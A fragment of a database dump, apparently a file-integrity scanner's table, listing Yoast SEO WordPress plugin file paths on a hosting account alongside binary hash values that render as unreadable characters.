('’‚iz®‹Ši)•ì7+O', 'wp-content/plugins/wordpress-seo/src/presenters/meta-description-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/meta-description-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÂÃý§6EÿCpµùrHs', 'F	,ðqÉK¹Ô¬ÞÞÆ.²çáÝeåEþìžÍã', '', 0, '?'),
('ç_}kãæ%ÕáBñ›ï\r', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-author-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-author-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­ÉÝHœZ¿Á	rè#tð', '9h"}ûo''ÕÅœ{ÞÖTßW\nüµƒÇG‹#4´P%', '', 0, '?'),
('ê™ÜMˆuÃžZhú¥±Ó·', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-modified-time-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-modified-time-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'cb¤g=Öè+°U¯Dñ\r±', 'Wa²¬›ÅiƒøÒ£f”1çpÝ†wµNÿ„Ñâ', '', 0, '?'),
('×©ˆ›ócÚ#í|±˜Ç', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-published-time-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-published-time-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ó91b56x—öì÷«½º', '2ðR[¥,ZÀæË7MäE,ž%ì1úþdBS0uÿ', '', 0, '?'),
('¢º''¡*6ë$«b/Hûìè', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-publisher-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-publisher-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Á4A¼xèTÅ"Àî', 'žn²Ö*ñ!•Lv}Ì…99R?y˜5ç[tØ8Tâï§', '', 0, '?'),
('^ää¯¬}\\ð†¯ «Qå', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/description-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/description-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹"1S9jE­ÔK:÷+ÊŠ', 'œ[ÛK™ûšØ™8ôõn®âÙß/¿—»û/ô÷&cg', '', 0, '?'),
('''ÊqWE&/ßyUØÐ', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/image-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/image-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'kW:½EÁè,"xŸF÷', '00ö¿ÒÂnÚ”í¼Ò¡ãöÆö\0Gå£šCŠ¶Ëñ', '', 0, '?'),
('˜‚l?]ä°ZêµjKY³', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/locale-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/locale-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Z¡zbI2S8w%¦z9Ï', '7×1ô-Q×ìV@é6ý[o„YÚFUK!âRY÷ó', '', 0, '?'),
('uVºÐ˜¡Ç$|ù´›Îë€', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/site-name-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/site-name-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ý¬gN=th#ím¾{² ', '	5ß½‚ÉÚj÷ò˜S6Y…"vµðõH,Ðhµ™v', '', 0, '?'),
('W‰¼WO¢˜´>Œñ¤mA', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/title-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/title-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'êð:=I3‡$,î.Õ«CN', 'A™_SÄ·c1º­ICâœZcdû0IniAFñe', '', 0, '?'),
('J.žüÆŽ=UË¹!\\X', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/type-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/type-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '%@ÝÞg±ÕœaÐ[«', 'N)y\n«›žFa§J£r¦îbWÌ%‚C}uŠu''O"', '', 0, '?'),
('ÏÑÀMÐ›™™Ï£~&$', 'wp-content/plugins/wordpress-seo/src/presenters/open-graph/url-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/open-graph/url-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'S½KäboÚÚ®Y_ú', 'z~\nì—†Ïù¼N„N±Úë¥æ!ØÏ¡·‹ù«ýdŽ', '', 0, '?'),
('	cÒvR!t±÷Hv‘J', 'wp-content/plugins/wordpress-seo/src/presenters/rel-next-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/rel-next-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ë-,“;¡ðN9x[à=', '7Õˆ‚P4Åõ¸¼÷œx›Ó§‘¤¹‚Çšhkræ/Éd''', '', 0, '?'),
('ßz#›>Ûlä±ñRÓå”f', 'wp-content/plugins/wordpress-seo/src/presenters/rel-prev-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/rel-prev-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"úšJÉ‰ŒñÎ_0¯2˜', 'k¯1øÏÃÜû_V¶æ,ï@à­’{`ÍòZ§Ç>è$Å.', '', 0, '?'),
('ÖeÆ™ å}ÇœMWÔ»-–‡', 'wp-content/plugins/wordpress-seo/src/presenters/robots-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/robots-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¡Þ‰éI_‚—ÄÙPrÊY¼', 'X³ÄWJ¦×ªåoD9C½40è³7P”a Q', '', 0, '?'),
('''ÅÎ{\0‰¶ÛÅà‡o];', 'wp-content/plugins/wordpress-seo/src/presenters/robots-txt-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/robots-txt-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '''˜;5_Êkô!à´ú0add', 'Ž›RR\\wÝ}°nèkhÆ³õrÈzoè	N\Zí7—HÙ0', '', 0, '?'),
('šZ{_ðµþ¶Ò3‚X\0R', 'wp-content/plugins/wordpress-seo/src/presenters/schema-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/schema-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '±§álÃ{ŸSoH\r{''8É', '9s\ZÄ¨È×Î†9™g''áñÜ`Îª£-Ò1‹)w!Ž', '', 0, '?'),
('Ho¹ç‰LïÌ:ÚY¬²', 'wp-content/plugins/wordpress-seo/src/presenters/score-icon-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/score-icon-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ûZqß"(3ÉÜ«sêEl7', '2ÉßÜÃ‹Ù„3~)&ÂNºàd*©°Î³iL“¾ÎÐ', '', 0, '?'),
('4ÀÚišªÖn-¤¯²ú', 'wp-content/plugins/wordpress-seo/src/presenters/slack/enhanced-data-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/slack/enhanced-data-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'd\Z—Rž´4Æ¨RY%', '>Tù?¾Â÷\n.Sóö03Ì‚''''Âl¦:ˆ¥', '', 0, '?'),
('›“õé¯Xæ1ÓLÈwðþã^', 'wp-content/plugins/wordpress-seo/src/presenters/title-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/title-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ôZ±š |eÌO~ÅMÑ–', '…þkEÆÈË“ÈI~¬ÿ-£ÑI\r[€UÄ@÷Ôez¨g', '', 0, '?'),
('´²²\09XÎs¶e€!¬Mö', 'wp-content/plugins/wordpress-seo/src/presenters/twitter/card-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/twitter/card-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'i{Â3íéø²üZWêÒT', 'ß¬uB³4!²bU¢g+BwÜ²‰Iã=˜ž±Ã£«Fã', '', 0, '?'),
('"huy=±‰,·ÎïåvÖ', 'wp-content/plugins/wordpress-seo/src/presenters/twitter/creator-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/twitter/creator-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '–~è»YPq–cr6Í', 'ë-\n$¸ÓPþo¼i{b½bii;‰1›Û¹[‰¿¥à', '', 0, '?'),
('. M×;ìà£_›\\àŒT', 'wp-content/plugins/wordpress-seo/src/presenters/twitter/description-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/twitter/description-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '$>x±©føguêÃÆ', 'sòa¬1¢ŒtI•“b(—qrèXÏøµóÆ[ùƒ„mÿô', '', 0, '?'),
('Ä3k<R6ˆ€¹ƒÏÖ”zÉ', 'wp-content/plugins/wordpress-seo/src/presenters/twitter/image-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/twitter/image-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ìbÛ´|…=}ÿ˜gqyd!', '\n(<^Äí–‡ªö×™¬}î;>Üí¡RxØ–i', '', 0, '?'),
('às©tˆÓdkMˆwÀUO8', 'wp-content/plugins/wordpress-seo/src/presenters/twitter/site-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/twitter/site-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '(«\0šPV\rÊ¯e–Á•ýa', '\n-Wb·‰gëº”Åw¢&¹y8ôð_·º1úÐ(/', '', 0, '?'),
('6iD–æ‰6‡lÚã)Â<”', 'wp-content/plugins/wordpress-seo/src/presenters/twitter/title-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/twitter/title-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '60ü×XrrËT?˜–u´''', '‘öP&à_ôñüøhÉ;\0ÙHÎ«|ºL)Å”ìp/', '', 0, '?'),
('Ë“^Q’Õò|bxÆf^ä', 'wp-content/plugins/wordpress-seo/src/presenters/url-list-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/url-list-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ã˜¯eyI°ºT|%x', 'ŽUý”¶ñ-÷MÅ‡äÙ G‚Ïj›v‘¦0>ž¦›ë%ø', '', 0, '?'),
('çÎ¨Å&>BµÔÅþÚ@™Â', 'wp-content/plugins/wordpress-seo/src/presenters/webmaster/baidu-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/webmaster/baidu-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'v4õíòË6Yc±"¶’Ž', 'Œ«lÂ3ÉvuÄâeìRþW$w{P{2Å}`', '', 0, '?'),
('!ñ-ã\r.á±d7Oø', 'wp-content/plugins/wordpress-seo/src/presenters/webmaster/bing-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/webmaster/bing-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Þ\\WÃîÈ¹zðX#Ë}U', 'ë7Zh÷\Z]7`òNÈ`ÚÅˆ\ZTø(ÛŽýJäacØ0J', '', 0, '?'),
(',’Ê„}žz×ËUêšÀÊ', 'wp-content/plugins/wordpress-seo/src/presenters/webmaster/google-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/webmaster/google-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ZÆ''#‘ŸÄÁÂµÎu_', '2ÛdÂe;ÖÛpiM<ðÄ±Œ9~Åëæü7ý&V]m¼', '', 0, '?'),
('ø~!ª†y"?¥¾²¡', 'wp-content/plugins/wordpress-seo/src/presenters/webmaster/pinterest-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/webmaster/pinterest-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'è•‘˜ª$¦›ªIê', 'ŠûYþ\r‹mÑÎvðñRPòšA£û>‚oJa^Gq”Ð', '', 0, '?'),
('çú~ÆW´ŸSê~±QÀ', 'wp-content/plugins/wordpress-seo/src/presenters/webmaster/yandex-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/webmaster/yandex-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5&HåJî‹ïî˜¿öÆ', 'G¶WQeN~Tº´EHÁÏsÈjÄâŽpÄ"¸nŠŒ„Æï', '', 0, '?'),
('‘E–Û\Z8„’h-¿', 'wp-content/plugins/wordpress-seo/src/promotions/application/promotion-manager-interface.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/promotions/application/promotion-manager-interface.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'J''Ì¥''î_Î švùÀ©', 'à=djÒ?deŸ ½ß÷lá¬”\rí=CK™Z§!', '', 0, '?'),
('”g—Éù˜¿²žþ!5ãß¿', 'wp-content/plugins/wordpress-seo/src/promotions/application/promotion-manager.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/promotions/application/promotion-manager.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '•6†Už>yVçÍTq¥â‘\n', 'Û.ôæmÉÊÏR›üÃ]Šo£¶—§¹§Þ“õAæ}X', '', 0, '?'),
('£§ÊÍ	¸Yj†½¨1“.‚', 'wp-content/plugins/wordpress-seo/src/promotions/domain/abstract-promotion.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/promotions/domain/abstract-promotion.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'D«¢7\0½œU‘Ð`,*™f', '’ê§«‘†2ÎZßr„^l³´ŸØwœßHA{×Ê‚', '', 0, '?'),
('X!ÊºZ§Pç­Ï‹¬P<<', 'wp-content/plugins/wordpress-seo/src/promotions/domain/black-friday-checklist-promotion.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/promotions/domain/black-friday-checklist-promotion.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÚÝˆor¨ÆçmÍLw^ã', 'èãªqùïMˆã(¥A­/ÍNñ1qv‰I^¤-?’ê¬', '', 0, '?'),
('b¤&ÖiŠ½þé¹‹ˆ(I‘', 'wp-content/plugins/wordpress-seo/src/promotions/domain/black-friday-promotion.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/promotions/domain/black-friday-promotion.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÀÅa"b²©õãÈv‹ˆ\n', 'Õó¬¾y¡â<<§Aé©£''yiÎ©>;Ç;', '', 0, '?'),
('eÊÓý‚F›Îæçë', 'wp-content/plugins/wordpress-seo/src/promotions/domain/promotion-interface.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/promotions/domain/promotion-interface.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '†!ù3±Q‚Ôi—Æêƒ}', '=+_»ÐÀ<;wlAR¼í¯ƒ@‘Æ¶Áz[ò4«¼U', '', 0, '?'),
('•Œ¦\r5­Ë&«édCÑî}', 'wp-content/plugins/wordpress-seo/src/promotions/domain/time-interval.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/promotions/domain/time-interval.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'GË²\\(ô	ÓºFzåg', 'Ì£Zûì‚xÁ;\0†¤Î\r7ÖFë2nNÔ“ÉVj', '', 0, '?'),
('ÅÖ¦ÛAb.X²qÿ®', 'wp-content/plugins/wordpress-seo/src/repositories/indexable-cleanup-repository.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/repositories/indexable-cleanup-repository.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'œÆ;)–<ÆMý0ë¯ÉŸ¢', 'ÏõÂ©–ÝªÇáÐ\r‰V©ˆ:®¨–ð&,°N‡"·û', '', 0, '?'),
('±$³%''aË­¸Ø§Îø', 'wp-content/plugins/wordpress-seo/src/repositories/indexable-hierarchy-repository.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/repositories/indexable-hierarchy-repository.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'C™\0¾XdcƒM2Õ}i6', 'Äî\Z¼ÿ¼þV×Ìñ¥)Û=iØ/)·B``õÌq', '', 0, '?'),
('1ˆÃ/	`Ðs·á£Õ;=\Z', 'wp-content/plugins/wordpress-seo/src/repositories/indexable-repository.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/repositories/indexable-repository.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'n\\Þù»ùÇ\\§,ŸUwÓ&>', '1\Z,É#²xZ ó»=¨-é¼"öÛ“Ÿì•¿O¯/	ý', '', 0, '?'),
('§ê´:üâÒÜ^é	6T4®', 'wp-content/plugins/wordpress-seo/src/repositories/primary-term-repository.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/repositories/primary-term-repository.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÀfÁ‚ÿýWc7^\rÅÿ', 'Qöboà1¤“É[+iÖ<ðX·`K)Í½WÁ,ß0°', '', 0, '?'),
(']<aÈî[4ªr«g?è', 'wp-content/plugins/wordpress-seo/src/repositories/seo-links-repository.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/repositories/seo-links-repository.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'º†h!qÊïØ Ê½Ô:ÆÇ', 'ï„úÅ\0\\Â(''7µ™Œ’QÆzrœå|Î9`ËÚÈ3$ñ', '', 0, '?'),
('àqrÐß‡Eß C‰J', 'wp-content/plugins/wordpress-seo/src/routes/abstract-action-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/abstract-action-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÇDë0Wâ¬sIaõ\ry«‹5', 'ZÿŠM))uìBzåmœ¤x^’š JÄ¿8Ö¡r“', '', 0, '?'),
('9Åç…ýs\\Ñp¤X«)H', 'wp-content/plugins/wordpress-seo/src/routes/abstract-indexation-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/abstract-indexation-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '/D¶0_VœQm°>t¯', '‹ 7&Â­óéÃú¢]¿kÒpŸ&à–ä«c7ò›“¿òû', '', 0, '?'),
('>''¹8`¸\\éÝ°©ÜWÜ', 'wp-content/plugins/wordpress-seo/src/routes/alert-dismissal-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/alert-dismissal-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'î,(!*ÌÅ¤‡ëÁ÷Œ	 ˆ', 'ÚT§9¦ïJÚánÁuçØ”8ñ\rç*uþ_š\ZBì', '', 0, '?'),
('T}&K.øüb†6¾Ø–s', 'wp-content/plugins/wordpress-seo/src/routes/first-time-configuration-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/first-time-configuration-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6É–¯ÕqŠa%ÀUàf', 'U‹‘³«X.ižbM÷°œƒÁÅ.›ÉÏŸrN¿', '', 0, '?'),
('	1š\Z]BåÒÞÀu¬ŸŠ5Ú', 'wp-content/plugins/wordpress-seo/src/routes/importing-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/importing-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\\ïo*\Zƒg¥ù&8l~£¡', 'F„‰‚Óz‡³<`–‚[>zº“ø;šSÜUÐÃÝlY', '', 0, '?'),
('9ÅÎ‚öæ‹îçÿQ]­8÷', 'wp-content/plugins/wordpress-seo/src/routes/indexables-head-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/indexables-head-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'iëÏ~ì¥ðÉkJÞo6%¤', 'O’î=‰xÂÂAp°8|-öŸWø+/T©˜sHÏß£V', '', 0, '?'),
('Îuè‡‰îQð¡³p˜0t', 'wp-content/plugins/wordpress-seo/src/routes/indexing-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/indexing-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ð¯8Ðq€7¿ð‹±|æ°', 'ùKgúb˜N¶-iÇb(¨±ý R)Öþcµ•h‡çR', '', 0, '?'),
('‘å,•Ö\\P~«ª0y½Ž', 'wp-content/plugins/wordpress-seo/src/routes/integrations-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/integrations-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '®ü…p©¬KƒI†Ô5¥òÃÃ', 'ê³SJ\\WïVPÅ™ÚÒ–ª6ÖÜÕÞ˜î¿ A¼úò', '', 0, '?'),
('"LÎ§ƒMòò®g†y', 'wp-content/plugins/wordpress-seo/src/routes/meta-search-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/meta-search-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'óN`Žd12ì¡ú•Pf—>', '3v†íª9Ñ¸Êg h´\0sz0Ô,ô\nŽ{ÄK`¾[†µ*', '', 0, '?'),
('¹dSp@±éÚ÷\\Òí0)¦q', 'wp-content/plugins/wordpress-seo/src/routes/route-interface.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/route-interface.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×Núä¶ˆHu,îðïÌ', 'M˜Ï\0un~ÉÑ×ƒ§Xé”T’¨TÅàêø’,K8UÍÉ', '', 0, '?'),
('ï´òuÓ+€–©Þ¢šû', 'wp-content/plugins/wordpress-seo/src/routes/semrush-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/semrush-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '76ßÚ–K·Ä¡Uì¨ÿ¾–', 'ÄÜÔÈ ‰@\rœì6Ðéïí¨…ð,s†	ë¹¹î¾_Ç', '', 0, '?'),
('#|FÌ‰³%Ÿ¡ºšŸ\Z', 'wp-content/plugins/wordpress-seo/src/routes/supported-features-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/supported-features-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1`.9÷>v4³0ØVÇY”', '8C\Zi{˜ßzêQ,£Q#+±ŸB/Ýéd+q=*œ¾\n3º', '', 0, '?'),
('l;\\F€v_Ò-x\\3{', 'wp-content/plugins/wordpress-seo/src/routes/wincher-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/wincher-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ðQ®ŽË''lÖ_ó­OØE', 'ô8ü`4Te–‹I¾·Ðo˜ÏL¡0''ÁJÓÊ Ì)·z', '', 0, '?'),
('Ÿ! d´þ‹àˆxO\r<§', 'wp-content/plugins/wordpress-seo/src/routes/workouts-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/workouts-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¼îÐð(ö %ú;‘a(', '¸ˆñü§ ¾ç\r\0Ãh®“	‚^âøÿ&‘iQÿp9\n', '', 0, '?'),
('wì´+2v¸)wq0¶''OG¯', 'wp-content/plugins/wordpress-seo/src/routes/yoast-head-rest-field.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/routes/yoast-head-rest-field.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'šb×cû²[I/ÃÞÞ„	v', 'ö¯*M›a°†n¥¸8CŒH)0©÷šï.êô-T˜æ', '', 0, '?'),
('zn¦3þƒÎ,º„Mìæmê', 'wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-check.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-check.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '†èmû7Tñ§¶L»ò', 'IÚÈâÚ&õ+ìiÖà¬(’`eð\Zè=~ªÅ’ˆ.S0ä', '', 0, '?'),
('%	n¨\r3\ZÞñž´:×E', 'wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-reports.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-reports.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ü=“\ZEÉ‰§§çãôÒ', '7»ÍwÏÑË´Žñ#Á%•êÓßr¦\rP¬›4û­', '', 0, '?'),
('[‘ã—¤q`1øßê‘óÊx', 'wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-runner.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-runner.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',ƒóÃWû9ÓBšÑâ¬Ä', 'eZ9[L-¡e_ì”Êr¾çše–G"ã''Km…éï''', '', 0, '?'),
('¸j³1=ñÈîd½ô/;', 'wp-content/plugins/wordpress-seo/src/services/health-check/health-check.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/services/health-check/health-check.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ùQÛþã×‚/©¡x\Z:½', 'Ö 4P!H-„…pï0Œ§ý‘ÁÈ)R€Èd£p=ŒF', '', 0, '?'),
('ÚêqØ¼‹¶\0p,ž±‹', 'wp-content/plugins/wordpress-seo/src/services/health-check/links-table-check.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/services/health-check/links-table-check.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'fÑÑŽqM–>Ö¤8Ê—', '3H•U´ùukê±KQÍèË€<t_RÉ2àq^6', '', 0, '?'),
('ÜÚóÚ›Ê)$«,ò·V', 'wp-content/plugins/wordpress-seo/src/services/health-check/links-table-reports.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/services/health-check/links-table-reports.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'jâÆ8ùÅ‹g‡Øûg#', 'Z´9×Ä¨Þ‡9î²ßñða®g]·›Vvúb‘n', '', 0, '?'),
('æéì^î@#¯šdÙVÑ©', 'wp-content/plugins/wordpress-seo/src/services/health-check/links-table-runner.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/services/health-check/links-table-runner.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Rey’Èý²‡ SsÅ¦»f', '78²Õ[{·"G²ª‚~­O¿	[¢ŒbhJÁ£Õ#§', '', 0, '?'),
